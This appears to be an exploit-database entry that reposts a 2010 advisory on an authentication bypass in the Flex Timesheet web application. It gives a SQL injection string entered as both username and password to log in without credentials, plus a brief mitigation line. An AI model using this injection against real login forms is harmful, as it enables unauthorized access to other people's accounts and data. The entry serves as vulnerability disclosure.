Flex Timesheet - Authentication Bypass() Vulnerability

vendor:

Flex Timesheet

by:

KnocKout

7,5

CVSS

HIGH

Authentication Bypass

287

CWE

Product Name: Flex Timesheet

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Flex Timesheet – Authentication Bypass() Vulnerability

A vulnerability in Flex Timesheet allows an attacker to bypass authentication by entering 'or'h4x0reSEC as the username and password.

Mitigation:

Ensure that authentication is properly implemented and that user input is properly validated.

Source

Exploit-DB raw data:

===================================================
Flex Timesheet - Authentication Bypass() Vulnerability
===================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Flex Timesheet
~Software: http://truworthit.com/ - Price:200$
~Vulnerability Style : Authentication Bypass()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
    ~~~~~~~~ Explotation ~~~~~~~~~~~
 
    bypass foR Sql-i Code()
    ================================
    Username : 'or'h4x0reSEC
    Password : 'or'h4x0reSEC
    ================================
          [+]  Logged on.
 
           
       
      GoodLucK ;)


# Inj3ct0r.com [2010-09-28]